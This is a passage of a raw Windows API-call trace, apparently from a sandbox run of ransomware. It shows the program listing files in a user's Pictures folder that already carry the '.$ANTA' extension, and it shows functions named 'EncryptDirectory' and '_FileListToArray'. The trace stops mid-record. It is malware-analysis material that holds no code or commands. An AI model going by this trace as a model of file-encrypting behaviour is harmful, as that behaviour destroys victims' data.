1 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.457] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.457] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0091.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0091.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0091.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0091.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.458] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0091.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0091.458] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.458] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.458] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525047, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x525047, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x5e3d83, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="desktop.ini.$ANTA", cAlternateFileName="DESKTO~1.$AN")) returned 1 [0091.458] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.458] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.458] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.458] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ad9b9, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x7ad9b9, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x7fa3fc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x14640, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="eY_MSASCT-tpPguP.bmp.$ANTA", cAlternateFileName="EY_MSA~1.$AN")) returned 1 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b8a11, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x8b8a11, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xa0ffde, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x19b0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="fW_IRtjvKhZB-.bmp.$ANTA", cAlternateFileName="FW_IRT~1.$AN")) returned 1 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc724fa, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xc724fa, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xd57421, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xf660, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="GbOsv53gLsdhP15shLc.jpg.$ANTA", cAlternateFileName="GBOSV5~1.$AN")) returned 1 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6242c, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xe6242c, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xf4737b, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x18810, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="h5_ZfAY-6STnb.gif.$ANTA", cAlternateFileName="H5_ZFA~1.$AN")) returned 1 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.459] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10eaba2, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x10eaba2, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x11cfac1, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x12980, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="i5q_5Bq6.bmp.$ANTA", cAlternateFileName="I5Q_5B~1.$AN")) returned 1 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1300dd8, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1300dd8, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x147e4b1, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xd2a0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="KI1iqiSuYI.jpg.$ANTA", cAlternateFileName="KI1IQI~1.$AN")) returned 1 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16e0a84, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x16e0a84, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x18879e5, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x3e80, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="kr_O D2ok83jLZ-Nq.jpg.$ANTA", cAlternateFileName="KR_OD2~1.$AN")) returned 1 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.460] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aea029, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1aea029, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1c415fe, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x3a50, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="qBLfci.gif.$ANTA", cAlternateFileName="QBLFCI~1.$AN")) returned 1 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d0001d, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1d0001d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1eaa3ac, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x17450, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="Rk8a.png.$ANTA", cAlternateFileName="RK8APN~1.$AN")) returned 1 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.461] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ffb00b, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1ffb00b, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x225d613, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x167c0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="wWIF_SR6x0w3shayx.jpg.$ANTA", cAlternateFileName="WWIF_S~1.$AN")) returned 1 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e5dab, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x24e5dab, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x26af9a2, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x110a0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="XwG8Sj1nv9U.bmp.$ANTA", cAlternateFileName="XWG8SJ~1.$AN")) returned 1 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285341e, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x285341e, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x2911f74, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xfa90, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="YwIpia.gif.$ANTA", cAlternateFileName="YWIPIA~1.$AN")) returned 1 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.462] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.463] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.463] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.463] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e24a0, ftCreationTime.dwHighDateTime=0x144eff0, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e24a0, ftLastWriteTime.dwLowDateTime=0x43ea958, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="", cAlternateFileName="мńဓ+\x10")) returned 0 [0091.463] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.463] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.463] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0091.463] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Camera Roll|cLIkSZ|Saved Pictures", cchCount1=34, lpString2="", cchCount2=0) returned 3 [0091.463] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0091.464] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0091.464] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0091.464] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0091.464] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0091.464] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.464] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0091.464] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.464] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.464] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.464] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.464] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.464] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.464] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll")) returned 0x11 [0091.467] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.467] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.467] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.467] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca298, cFileName=".", cAlternateFileName="")) returned 0x41ac280 [0091.467] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca298, cFileName="..", cAlternateFileName="")) returned 1 [0091.467] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, 